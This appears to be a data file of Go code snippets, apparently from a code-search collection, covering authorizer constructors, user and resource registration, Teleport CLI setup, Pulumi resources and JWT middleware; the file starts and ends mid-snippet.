claims.StandardClaims.Subject\n\t}\n\n\tgstore := storev2.Of[R](h.Store)\n\n\tif err := gstore.CreateIfNotExists(r.Context(), payload); err != nil {\n\t\tswitch err := err.(type) {\n\t\tcase *store.ErrAlreadyExists:\n\t\t\treturn nil, actions.NewErrorf(actions.AlreadyExistsErr)\n\t\tcase *store.ErrNotValid:\n\t\t\treturn nil, actions.NewError(actions.InvalidArgument, err)\n\t\tdefault:\n\t\t\treturn nil, actions.NewError(actions.InternalErr, err)\n\t\t}\n\t}\n\n\treturn nil, nil\n}", "func resourceCreateAuthServer(d *schema.ResourceData, m interface{}) error {\n\tnagiosClient := m.(*Client)\n\n\tauthServer := setAuthServerFromSchema(d)\n\n\tbody, err := nagiosClient.newAuthServer(authServer)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = json.Unmarshal(body, &authServer)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Nagios does some weird stuff with auth servers. When you create one, it returns server_id\n\t// However, when attempting to read, the API wants server_id as an input, but returns id, so we must have both values and keep them\n\t// set to the same value\n\tauthServer.ID = authServer.ServerID\n\n\td.SetId(authServer.ID)\n\n\treturn resourceReadAuthServer(d, m)\n}", "func NewAuthorize() cli.Command {\n\treturn &Authorize{}\n}", "func NewAuthorizerFromCLIWithResource(resource string) (autorest.Authorizer, error) {\n\ttoken, err := cli.GetTokenFromCLI(resource)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tadalToken, err := token.ToADALToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(&adalToken), nil\n}", "func NewAuthorizerFromCLIWithResource(resource string) (autorest.Authorizer, error) {\n\ttoken, err := cli.GetTokenFromCLI(resource)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tadalToken, err := token.ToADALToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(&adalToken), nil\n}", "func NewAuthorizer(enforcer enforcer.Enforcer) (*Authorizer, error) {\n\t// Set up Turing API specific policies\n\terr := upsertExperimentEnginesListAllPolicy(enforcer)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &Authorizer{authEnforcer: enforcer}, nil\n}", "func NewAuthorizer(e *casbin.Enforcer) beego.FilterFunc {\n\treturn func(ctx *context.Context) {\n\t\ta := &BasicAuthorizer{enforcer: e}\n\n\t\tif !a.CheckPermission(ctx) {\n\t\t\ta.RequirePermission(ctx)\n\t\t}\n\t}\n}", "func New(config *Config) (api.Authorize, error) {\n\tif config == nil {\n\t\tconfig = NewDefaultConfig()\n\t}\n\n\treturn &authorizer{config: config}, nil\n}", "func newServerAuthorizer(pattern security.BlessingPattern, opts ...rpc.CallOpt) security.Authorizer {\n\tif len(pattern) == 0 {\n\t\treturn authorizerFromOpts(opts...)\n\t}\n\treturn &serverAuthorizer{\n\t\tauth: authorizerFromOpts(opts...),\n\t\textraPattern: pattern,\n\t}\n}", "func NewAuthorizer(introspector TokenIntrospecter, cfg *Config) *Authorizer {\n\treturn &Authorizer{introspection: introspector, config: cfg}\n}", "func Register(\n\tc *gin.Context,\n\tuserService service.UserCommander,\n\tdispatcher queue.Publisher,\n) {\n\tvar req ar.RegisterRequest\n\tif isValid, errors := validation.ValidateRequest(c, &req); !isValid {\n\t\thttp.BadRequest(c, http.Errors(errors))\n\t\treturn\n\t}\n\n\tuser, err := userService.Create(c.Request.Context(), request.UserCreateRequest{\n\t\tFirstName: req.FirstName,\n\t\tLastName: req.LastName,\n\t\tEmail: req.Email,\n\t\tPassword: req.Password,\n\t\tRole: identityEntity.RoleConsumer,\n\t})\n\n\tif err != nil {\n\t\thttp.BadRequest(c, http.Errors{err.Error()})\n\t\treturn\n\t}\n\n\traiseSuccessfulRegistration(user.GetID(), dispatcher)\n\n\thttp.Created(c, http.Data{\n\t\t\"User\": user,\n\t}, nil)\n}", "func NewResourceAuth(init ...*ResourceAuth) *ResourceAuth {\n\tvar o *ResourceAuth\n\tif len(init) == 1 {\n\t\to = init[0]\n\t} else {\n\t\to = new(ResourceAuth)\n\t}\n\treturn o\n}", "func NewAuthorizer(userDao dao.UserInterface, defaultRole string, roles map[string]Role) (Authorizer, error) {\n\tvar a Authorizer\n\ta.userDao = userDao\n\ta.roles = roles\n\ta.defaultRole = defaultRole\n\tif _, ok := roles[defaultRole]; !ok {\n\t\tlogger.Get().Error(\"Default role provided is not valid\")\n\t\treturn a, mkerror(\"defaultRole missing\")\n\t}\n\treturn a, nil\n}", "func NewAuthorizerFromCLI() (autorest.Authorizer, error) {\n\tsettings, err := getAuthenticationSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif settings.resource == \"\" {\n\t\tsettings.resource = settings.environment.ResourceManagerEndpoint\n\t}\n\n\treturn NewAuthorizerFromCLIWithResource(settings.resource)\n}", "func Register(name string, factory acl.Factory) {\n\tmu.Lock()\n\tdefer mu.Unlock()\n\tif _, ok := acls[name]; ok {\n\t\tpanic(fmt.Sprintf(\"register a registered key: %s\", name))\n\t}\n\tacls[name] = factory\n}", "func (rc *ResourceCommand) Initialize(app *kingpin.Application, config *servicecfg.Config) {\n\trc.CreateHandlers = map[ResourceKind]ResourceCreateHandler{\n\t\ttypes.KindUser: rc.createUser,\n\t\ttypes.KindRole: rc.createRole,\n\t\ttypes.KindTrustedCluster: rc.createTrustedCluster,\n\t\ttypes.KindGithubConnector: rc.createGithubConnector,\n\t\ttypes.KindCertAuthority: rc.createCertAuthority,\n\t\ttypes.KindClusterAuthPreference: rc.createAuthPreference,\n\t\ttypes.KindClusterNetworkingConfig: rc.createClusterNetworkingConfig,\n\t\ttypes.KindClusterMaintenanceConfig: rc.createClusterMaintenanceConfig,\n\t\ttypes.KindSessionRecordingConfig: rc.createSessionRecordingConfig,\n\t\ttypes.KindUIConfig: rc.createUIConfig,\n\t\ttypes.KindLock: rc.createLock,\n\t\ttypes.KindNetworkRestrictions: rc.createNetworkRestrictions,\n\t\ttypes.KindApp: rc.createApp,\n\t\ttypes.KindDatabase: rc.createDatabase,\n\t\ttypes.KindKubernetesCluster: rc.createKubeCluster,\n\t\ttypes.KindToken: rc.createToken,\n\t\ttypes.KindInstaller: rc.createInstaller,\n\t\ttypes.KindNode: rc.createNode,\n\t\ttypes.KindOIDCConnector: rc.createOIDCConnector,\n\t\ttypes.KindSAMLConnector: rc.createSAMLConnector,\n\t\ttypes.KindLoginRule: rc.createLoginRule,\n\t\ttypes.KindSAMLIdPServiceProvider: rc.createSAMLIdPServiceProvider,\n\t\ttypes.KindDevice: rc.createDevice,\n\t\ttypes.KindOktaImportRule: rc.createOktaImportRule,\n\t\ttypes.KindIntegration: rc.createIntegration,\n\t\ttypes.KindWindowsDesktop: rc.createWindowsDesktop,\n\t\ttypes.KindAccessList: rc.createAccessList,\n\t}\n\trc.config = config\n\n\trc.createCmd = app.Command(\"create\", \"Create or update a Teleport resource from a YAML file.\")\n\trc.createCmd.Arg(\"filename\", \"resource definition file, empty for stdin\").StringVar(&rc.filename)\n\trc.createCmd.Flag(\"force\", \"Overwrite the resource if already exists\").Short('f').BoolVar(&rc.force)\n\trc.createCmd.Flag(\"confirm\", \"Confirm an unsafe or temporary resource update\").Hidden().BoolVar(&rc.confirm)\n\n\trc.updateCmd = app.Command(\"update\", \"Update resource fields.\")\n\trc.updateCmd.Arg(\"resource type/resource name\", `Resource to update\n\t<resource type> Type of a resource [for example: rc]\n\t<resource name> Resource name to update\n\n\tExample:\n\t$ tctl update rc/remote`).SetValue(&rc.ref)\n\trc.updateCmd.Flag(\"set-labels\", \"Set labels\").StringVar(&rc.labels)\n\trc.updateCmd.Flag(\"set-ttl\", \"Set TTL\").StringVar(&rc.ttl)\n\n\trc.deleteCmd = app.Command(\"rm\", \"Delete a resource.\").Alias(\"del\")\n\trc.deleteCmd.Arg(\"resource type/resource name\", `Resource to delete\n\t<resource type> Type of a resource [for example: connector,user,cluster,token]\n\t<resource name> Resource name to delete\n\n\tExamples:\n\t$ tctl rm connector/github\n\t$ tctl rm cluster/main`).SetValue(&rc.ref)\n\n\trc.getCmd = app.Command(\"get\", \"Print a YAML declaration of various Teleport resources.\")\n\trc.getCmd.Arg(\"resources\", \"Resource spec: 'type/[name][,...]' or 'all'\").Required().SetValue(&rc.refs)\n\trc.getCmd.Flag(\"format\", \"Output format: 'yaml', 'json' or 'text'\").Default(teleport.YAML).StringVar(&rc.format)\n\trc.getCmd.Flag(\"namespace\", \"Namespace of the resources\").Hidden().Default(apidefaults.Namespace).StringVar(&rc.namespace)\n\trc.getCmd.Flag(\"with-secrets\", \"Include secrets in resources like certificate authorities or OIDC connectors\").Default(\"false\").BoolVar(&rc.withSecrets)\n\trc.getCmd.Flag(\"verbose\", \"Verbose table output, shows full label output\").Short('v').BoolVar(&rc.verbose)\n\n\trc.getCmd.Alias(getHelp)\n\n\tif rc.stdout == nil {\n\t\trc.stdout = os.Stdout\n\t}\n}", "func (r *Registrar) Register(options RegisterOptions) (*Resource, error) {\n\tif r == nil || r.user == nil {\n\t\treturn nil, errors.New(\"acme: cannot register a nil client or user\")\n\t}\n\n\taccMsg := acme.Account{\n\t\tTermsOfServiceAgreed: options.TermsOfServiceAgreed,\n\t\tContact: []string{},\n\t}\n\n\tif r.user.GetEmail() != \"\" {\n\t\tlog.Infof(\"acme: Registering account for %s\", r.user.GetEmail())\n\t\taccMsg.Contact = []string{\"mailto:\" + r.user.GetEmail()}\n\t}\n\n\taccount, err := r.core.Accounts.New(accMsg)\n\tif err != nil {\n\t\t// seems impossible\n\t\tvar errorDetails acme.ProblemDetails\n\t\tif !errors.As(err, &errorDetails) || errorDetails.HTTPStatus != http.StatusConflict {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn &Resource{URI: account.Location, Body: account.Account}, nil\n}", "func NewAuthorizerFromFileWithResource(resource string) (autorest.Authorizer, error) {\n\tfile, err := getAuthFile()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tconfig, err := adal.NewOAuthConfig(file.ActiveDirectoryEndpoint, file.TenantID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalToken(*config, file.ClientID, file.ClientSecret, resource)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func New() (*CustomVerbAuthorizer, error) {\n\treturn &CustomVerbAuthorizer{\n\t\tHandler: admission.NewHandler(admission.Create, admission.Update),\n\t}, nil\n}", "func NewAuthorizerFromEnvironmentWithResource(resource string) (autorest.Authorizer, error) {\n\tlogger.Instance.Writeln(logger.LogInfo, \"NewAuthorizerFromEnvironmentWithResource() determining authentication mechanism\")\n\tsettings, err := GetSettingsFromEnvironment()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsettings.Values[Resource] = resource\n\treturn settings.GetAuthorizer()\n}", "func Register(name string, fc func(request *http.Request, user interface{}) bool) {\n\trole.Register(name, fc)\n}", "func (s *ResourcesService) Create(ctx context.Context, realm, clientID string, resource *Resource) (*Resource, *http.Response, error) {\n\tu := fmt.Sprintf(\"admin/realms/%s/clients/%s/authz/resource-server/resource\", realm, clientID)\n\treq, err := s.keycloak.NewRequest(http.MethodPost, u, resource)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar created Resource\n\tres, err := s.keycloak.Do(ctx, req, &created)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treturn &created, res, nil\n}", "func New(opts ...Option) (Authorizerd, error) {\n\tvar (\n\t\tprov = &authorizer{\n\t\t\tcache: gache.New(),\n\t\t}\n\t\terr error\n\n\t\tpubkeyProvider pubkey.Provider\n\t\tjwkProvider jwk.Provider\n\t)\n\n\tfor _, opt := range append(defaultOptions, opts...) {\n\t\tif err = opt(prov); err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"error creating authorizerd\")\n\t\t}\n\t}\n\n\tif !prov.disablePubkeyd {\n\t\tif prov.pubkeyd, err = pubkey.New(\n\t\t\tpubkey.WithAthenzURL(prov.athenzURL),\n\t\t\tpubkey.WithSysAuthDomain(prov.pubkeySysAuthDomain),\n\t\t\tpubkey.WithEtagExpTime(prov.pubkeyEtagExpTime),\n\t\t\tpubkey.WithEtagFlushDuration(prov.pubkeyEtagFlushDur),\n\t\t\tpubkey.WithRefreshDuration(prov.pubkeyRefreshDuration),\n\t\t\tpubkey.WithErrRetryInterval(prov.pubkeyErrRetryInterval),\n\t\t\tpubkey.WithHTTPClient(prov.client),\n\t\t); err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"error create pubkeyd\")\n\t\t}\n\n\t\tpubkeyProvider = prov.pubkeyd.GetProvider()\n\t}\n\n\tif !prov.disablePolicyd {\n\t\tif prov.policyd, err = policy.New(\n\t\t\tpolicy.WithExpireMargin(prov.policyExpireMargin),\n\t\t\tpolicy.WithEtagFlushDuration(prov.policyEtagFlushDur),\n\t\t\tpolicy.WithEtagExpTime(prov.policyEtagExpTime),\n\t\t\tpolicy.WithAthenzURL(prov.athenzURL),\n\t\t\tpolicy.WithAthenzDomains(prov.athenzDomains...),\n\t\t\tpolicy.WithRefreshDuration(prov.policyRefreshDuration),\n\t\t\tpolicy.WithErrRetryInterval(prov.policyErrRetryInterval),\n\t\t\tpolicy.WithHTTPClient(prov.client),\n\t\t\tpolicy.WithPubKeyProvider(prov.pubkeyd.GetProvider()),\n\t\t); err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"error create policyd\")\n\t\t}\n\t}\n\n\tif !prov.disableJwkd {\n\t\tif prov.jwkd, err = jwk.New(\n\t\t\tjwk.WithAthenzURL(prov.athenzURL),\n\t\t\tjwk.WithRefreshDuration(prov.jwkRefreshDuration),\n\t\t\tjwk.WithErrRetryInterval(prov.jwkErrRetryInterval),\n\t\t\tjwk.WithHTTPClient(prov.client),\n\t\t); err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"error create jwkd\")\n\t\t}\n\n\t\tjwkProvider = prov.jwkd.GetProvider()\n\t}\n\n\tprov.roleProcessor = role.New(\n\t\trole.WithPubkeyProvider(pubkeyProvider),\n\t\trole.WithJWKProvider(jwkProvider))\n\n\treturn prov, nil\n}", "func ExampleAuthorizationsClient_BeginCreateOrUpdate() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armavs.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tpoller, err := clientFactory.NewAuthorizationsClient().BeginCreateOrUpdate(ctx, \"group1\", \"cloud1\", \"authorization1\", armavs.ExpressRouteAuthorization{}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\tres, err := poller.PollUntilDone(ctx, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to pull the result: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.ExpressRouteAuthorization = armavs.ExpressRouteAuthorization{\n\t// \tName: to.Ptr(\"authorization1\"),\n\t// \tType: to.Ptr(\"Microsoft.AVS/privateClouds/authorizations\"),\n\t// \tID: to.Ptr(\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AVS/privateClouds/cloud1/authorizations/authorization1\"),\n\t// \tProperties: &armavs.ExpressRouteAuthorizationProperties{\n\t// \t\tExpressRouteAuthorizationID: to.Ptr(\"/subscriptions/5206f269-120b-41ef-a95b-0dce7109de61/resourceGroups/tnt34-cust-mockp02-spearj2dev/providers/Microsoft.Network/expressroutecircuits/tnt34-cust-mockp02-spearj2dev-er/authorizations/myauth\"),\n\t// \t\tExpressRouteAuthorizationKey: to.Ptr(\"37b0db3b-3b17-4c7b-bf76-bf13b01bcadc\"),\n\t// \t\tExpressRouteID: to.Ptr(\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/tnt13-41a90db2-9d5e-4bd5-a77a-5ce7b58213d6-eastus2/providers/Microsoft.Network/expressroutecircuits/tnt13-41a90db2-9d5e-4bd5-a77a-5ce7b58213d6-eastus2-xconnect\"),\n\t// \t\tProvisioningState: to.Ptr(armavs.ExpressRouteAuthorizationProvisioningStateSucceeded),\n\t// \t},\n\t// }\n}", "func NewPerson(ctx *pulumi.Context,\n\tname string, args *PersonArgs, opts ...pulumi.ResourceOption) (*Person, error) {\n\tif args == nil {\n\t\targs = &PersonArgs{}\n\t}\n\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Person\n\terr := ctx.RegisterResource(\"example::Person\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAuthorizer(configuration schema.AccessControlConfiguration) *Authorizer {\n\treturn &Authorizer{\n\t\tconfiguration: configuration,\n\t}\n}", "func NewAuthorization(domain, audience string) Authorization {\n\tlog.Debug(\"NewAuthorization started\")\n\tauth := Authorization{\n\t\tdomain: domain,\n\t\taudience: audience,\n\t}\n\n\tauth.middleware = jwtmiddleware.New(jwtmiddleware.Options{\n\t\tValidationKeyGetter: auth.validateToken,\n\t\tSigningMethod: jwt.SigningMethodRS256,\n\t\tErrorHandler: NotAuthorizedError,\n\t})\n\n\tlog.Debug(\"NewAuthorziation finished\")\n\treturn auth\n}", "func Authorize(ctx context.Context, args []string, noAutoBrowser bool, templateFile string) error {\n\tctx = suppressConfirm(ctx)\n\tctx = fs.ConfigOAuthOnly(ctx)\n\tswitch len(args) {\n\tcase 1, 2, 3:\n\tdefault:\n\t\treturn fmt.Errorf(\"invalid number of arguments: %d\", len(args))\n\t}\n\tType := args[0] // FIXME could read this from input\n\tri, err := fs.Find(Type)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif ri.Config == nil {\n\t\treturn fmt.Errorf(\"can't authorize fs %q\", Type)\n\t}\n\n\t// Config map for remote\n\tinM := configmap.Simple{}\n\n\t// Indicate that we are running rclone authorize\n\tinM[ConfigAuthorize] = \"true\"\n\tif noAutoBrowser {\n\t\tinM[ConfigAuthNoBrowser] = \"true\"\n\t}\n\n\t// Indicate if we specified a custom template via a file\n\tif templateFile != \"\" {\n\t\tinM[ConfigTemplateFile] = templateFile\n\t}\n\n\t// Add extra parameters if supplied\n\tif len(args) == 2 {\n\t\terr := inM.Decode(args[1])\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else if len(args) == 3 {\n\t\tinM[ConfigClientID] = args[1]\n\t\tinM[ConfigClientSecret] = args[2]\n\t}\n\n\t// Name used for temporary remote\n\tname := \"**temp-fs**\"\n\n\tm := fs.ConfigMap(ri, name, inM)\n\toutM := configmap.Simple{}\n\tm.ClearSetters()\n\tm.AddSetter(outM)\n\tm.AddGetter(outM, configmap.PriorityNormal)\n\n\terr = PostConfig(ctx, name, m, ri)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Print the code for the user to paste\n\tout := outM[\"token\"]\n\n\t// If received a config blob, then return one\n\tif len(args) == 2 {\n\t\tout, err = outM.Encode()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tfmt.Printf(\"Paste the following into your remote machine --->\\n%s\\n<---End paste\\n\", out)\n\n\treturn nil\n}", "func (ja *jwtAuthorizer) Create(network, authCode, redirectUrl string) (string, auth.Token, *auth.AuthUser, error) {\n\t//auth, err := backends[network].Get(authToken)\n\tauth, oauthtok, err := ja.auth(network, authCode, redirectUrl)\n\tif err != nil {\n\t\treturn \"\", nil, nil, err\n\t}\n\n\t// create a signer for rsa 256\n\tt := jwt.New(jwt.GetSigningMethod(\"RS256\"))\n\n\tt.Claims[\"AccessToken\"] = \"orca\"\n\tt.Claims[\"user\"] = *auth\n\tt.Claims[\"exp\"] = time.Now().Add(time.Minute * 60).Unix()\n\ttok, err := t.SignedString(ja.privKey)\n\treturn tok, oauthtok, auth, err\n}", "func (o *ShortenerAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func NewAuthorizerFromEnvironmentWithResource(resource string) (autorest.Authorizer, error) {\n\tsettings, err := getAuthenticationSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsettings.resource = resource\n\treturn settings.getAuthorizer()\n}", "func NewResource(typ, name, group, version, kind string, namespaced bool, opts ...Option) (*Resource, error) {\n\tropts := Options{}\n\tfor _, apply := range opts {\n\t\tapply(&ropts)\n\t}\n\n\tuid := ropts.UID\n\tif uid == nil {\n\t\tuid = memuid.New()\n\t}\n\n\ta := ropts.Attrs\n\tif a == nil {\n\t\ta = memattrs.New()\n\t}\n\n\tdotid := ropts.DOTID\n\tif dotid == \"\" {\n\t\tdotid = strings.Join([]string{\n\t\t\tgroup,\n\t\t\tversion,\n\t\t\tkind}, \"/\")\n\t}\n\n\treturn &Resource{\n\t\tuid: uid,\n\t\ttyp: typ,\n\t\tname: name,\n\t\tgroup: group,\n\t\tversion: version,\n\t\tkind: kind,\n\t\tnamespaced: namespaced,\n\t\tdotid: dotid,\n\t\tattrs: a,\n\t}, nil\n}", "func NewAuthorHandler(\n\tctx web.C, writer http.ResponseWriter, httpReq *http.Request,\n\tdbx *sqlx.DB, body []byte, _ model.User,\n) {\n\tvar req reqNewAuthor\n\terr := json.Unmarshal(body, &req)\n\tif hutil.ReportError(writer, err) {\n\t\treturn\n\t}\n\n\terr = req.validate()\n\tif hutil.ReportError(writer, err) {\n\t\treturn\n\t}\n\n\terr = model.CreateAuthor(dbx, req.Name, req.URL)\n\tif hutil.ReportError(writer, err) {\n\t\treturn\n\t}\n\n\thutil.ReportOK(writer)\n}", "func init() {\n\tauth.Register(\"entitlement\", auth.InitFunc(newAccessController))\n}", "func NewRegistrar(registrarFileName string) (*Registrar, error) {\n\tregistrarFile, err := os.Create(registrarFileName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tregistrarFile.Close()\n\tusersMap := make(map[string]userData)\n\tnetIDsMap := make(map[string]bool)\n\tnewRegistrar := Registrar{\n\t\tregistrarFileName: registrarFileName,\n\t\tusers: usersMap,\n\t\tregisteredNetIDs: netIDsMap,\n\t}\n\treturn &newRegistrar, nil\n}", "func Register(name string, c Creator) {\n\tcreatorMu.Lock()\n\tdefer creatorMu.Unlock()\n\n\tif c == nil {\n\t\tpanic(fmt.Sprintf(\"%s gatherer creator can't register as a nil\", name))\n\t}\n\n\tif _, dup := creators[name]; dup {\n\t\tpanic(fmt.Sprintf(\"%s gatherer creator already registered\", name))\n\t}\n\n\tlog.Logger.Infof(\"Gatherer creator registered: %s\", name)\n\tcreators[name] = c\n}", "func NewAuthorizer(signer pkg.Signer) Authorizer {\n\treturn &authorizer{\n\t\tsigner: signer,\n\t}\n}", "func createKubeAccessRequest(cf *CLIConf, resources []resourceKind, args []string) error {\n\ttc, err := makeClient(cf)\n\tif err != nil {\n\t\treturn trace.Wrap(err)\n\t}\n\tkubeName, err := getKubeClusterName(args, tc.SiteName)\n\tif err != nil {\n\t\treturn trace.Wrap(err)\n\t}\n\tfor _, rec := range resources {\n\t\tcf.RequestedResourceIDs = append(\n\t\t\tcf.RequestedResourceIDs,\n\t\t\tfilepath.Join(\"/\", tc.SiteName, rec.kind, kubeName, rec.subResourceName),\n\t\t)\n\t}\n\tcf.Reason = fmt.Sprintf(\"Resource request automatically created for %v\", args)\n\tif err := executeAccessRequest(cf, tc); err != nil {\n\t\t// TODO(tigrato): intercept the error to validate the origin\n\t\treturn trace.Wrap(err)\n\t}\n\treturn nil\n}", "func NewAuthorizerFromFileWithResource(resource string) (autorest.Authorizer, error) {\n\ts, err := GetSettingsFromFile()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif a, err := s.ClientCredentialsAuthorizerWithResource(resource); err == nil {\n\t\treturn a, err\n\t}\n\tif a, err := s.ClientCertificateAuthorizerWithResource(resource); err == nil {\n\t\treturn a, err\n\t}\n\treturn nil, errors.New(\"auth file missing client and certificate credentials\")\n}", "func NewResource(options ...func(*Resource)) *Resource {\n\tr := &Resource{resources: make([]flare.Resource, 0)}\n\n\tfor _, option := range options {\n\t\toption(r)\n\t}\n\n\tif r.subscriptionRepository == nil {\n\t\tr.subscriptionRepository = NewSubscription()\n\t}\n\n\treturn r\n}", "func resourceUserCreate(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {\n\temail := d.Get(\"email\").(string)\n\tteamIDs := getTeamIDs(d)\n\tl := log.With().\n\t\tStr(\"email\", email).\n\t\tInts(\"teamIDs\", teamIDs).\n\t\tLogger()\n\tl.Info().Msg(\"Creating rollbar_user resource\")\n\td.SetId(email)\n\treturn resourceUserCreateOrUpdate(ctx, d, meta)\n}", "func (r *ResourceHandler) CreateResource(resource []*models.Resource, scope ResourceScope, options ...URIOption) (string, error) {\n\tr.ensureHandlerIsSet()\n\treturn r.resourceHandler.CreateResource(context.TODO(), resource, toV2ResourceScope(scope), v2.ResourcesCreateResourceOptions{URIOptions: toV2URIOptions(options)})\n}", "func NewSubscription(ctx *pulumi.Context,\n\tname string, args *SubscriptionArgs, opts ...pulumi.ResourceOption) (*Subscription, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.SubscriptionName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'SubscriptionName'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Subscription\n\terr := ctx.RegisterResource(\"azure:core/subscription:Subscription\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func New(ctx context.Context, next http.Handler, config *Config, name string) (http.Handler, error) {\n\n\tif len(config.Path) == 0 || config.Path == \"\" {\n\t\tconfig.Path = \"/\"\n\t}\n\n\tif len(config.HeaderName) == 0 || config.HeaderName == \"\" {\n\t\tconfig.HeaderName = \"Authorization\"\n\t}\n\n\tif len(config.HeaderPrefix) == 0 || config.HeaderPrefix == \"\" {\n\t\tconfig.HeaderPrefix = \"\"\n\t}\n\n\tif len(config.ParamName) == 0 || config.ParamName == \"\" {\n\t\tconfig.ParamName = \"jwt\"\n\t}\n\n\treturn &JWTTransform{\n\t\tnext: next,\n\t\tname: name,\n\t\tconfig: config,\n\t}, nil\n}", "func CreateAuthorizationEndpoint(c echo.Context) error {\n\tvar req *a.AuthorizationRequest = new(a.AuthorizationRequest)\n\n\t// this endpoint is secured by a master token i.e. a shared secret between\n\t// the service and the client, NOT a JWT token !!\n\tbearer := GetBearerToken(c)\n\tif bearer != env.GetString(\"MASTER_KEY\", \"\") {\n\t\treturn c.NoContent(http.StatusUnauthorized)\n\t}\n\n\terr := c.Bind(req)\n\tif err != nil {\n\t\treturn api.ErrorResponse(c, http.StatusInternalServerError, err)\n\t}\n\n\ttoken, err := CreateJWTToken(req.Secret, req.Realm, req.ClientID, req.UserID, req.Scope, req.Duration)\n\tif err != nil {\n\t\treturn api.ErrorResponse(c, http.StatusInternalServerError, err)\n\t}\n\n\tnow := util.Timestamp()\n\tauthorization := Authorization{\n\t\tClientID: req.ClientID,\n\t\tName: req.Realm,\n\t\tToken: token,\n\t\tTokenType: req.ClientType,\n\t\tUserID: req.UserID,\n\t\tScope: req.Scope,\n\t\tExpires: now + (req.Duration * 86400), // Duration days from now\n\t\tAuthType: AuthTypeJWT,\n\t\tCreated: now,\n\t\tUpdated: now,\n\t}\n\terr = CreateAuthorization(appengine.NewContext(c.Request()), &authorization)\n\tif err != nil {\n\t\treturn api.ErrorResponse(c, http.StatusInternalServerError, err)\n\t}\n\n\tresp := a.AuthorizationResponse{\n\t\tRealm: req.Realm,\n\t\tClientID: req.ClientID,\n\t\tToken: token,\n\t}\n\treturn api.StandardResponse(c, http.StatusCreated, &resp)\n}", "func Register(ctx context.Context, args RegisterArgs) (*Client, error) {\n\tid, err := uuid.NewRandom()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"rmapi.Register: unable to generate uuid: %w\", err)\n\t}\n\tdata := registerPayload{\n\t\tToken: args.Token,\n\t\tDescription: args.Description,\n\t\tID: id.String(),\n\t}\n\tpayload := new(bytes.Buffer)\n\tif err := json.NewEncoder(payload).Encode(data); err != nil {\n\t\treturn nil, fmt.Errorf(\"rmapi.Register: unable to encode json payload: %w\", err)\n\t}\n\n\treq, err := http.NewRequestWithContext(ctx, http.MethodPost, registerURL, payload)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"rmapi.Register: unable to create http request: %w\", err)\n\t}\n\trefresh, err := readToken(req, 1024)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"rmapi.Register: %w\", err)\n\t}\n\treturn &Client{\n\t\tRefreshToken: refresh,\n\t}, nil\n}", "func New(ac *apictx.Context, router *httprouter.Router) {\n\t// Handle the routes\n\trouter.POST(\"/api/v1/email\", HandlePost(ac))\n}", "func NewResourceCreator(createFunc interface{}, receiver interface{}) ResourceCreator {\n\treturn ResourceCreator{\n\t\tObjectCreator: closure.NewObjectCreator(createFunc, receiver),\n\t}\n}", "func NewAlphabet(ctx *pulumi.Context,\n\tname string, args *AlphabetArgs, opts ...pulumi.ResourceOption) (*Alphabet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.Path == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Path'\")\n\t}\n\tvar resource Alphabet\n\terr := ctx.RegisterResource(\"vault:transform/alphabet:Alphabet\", name, 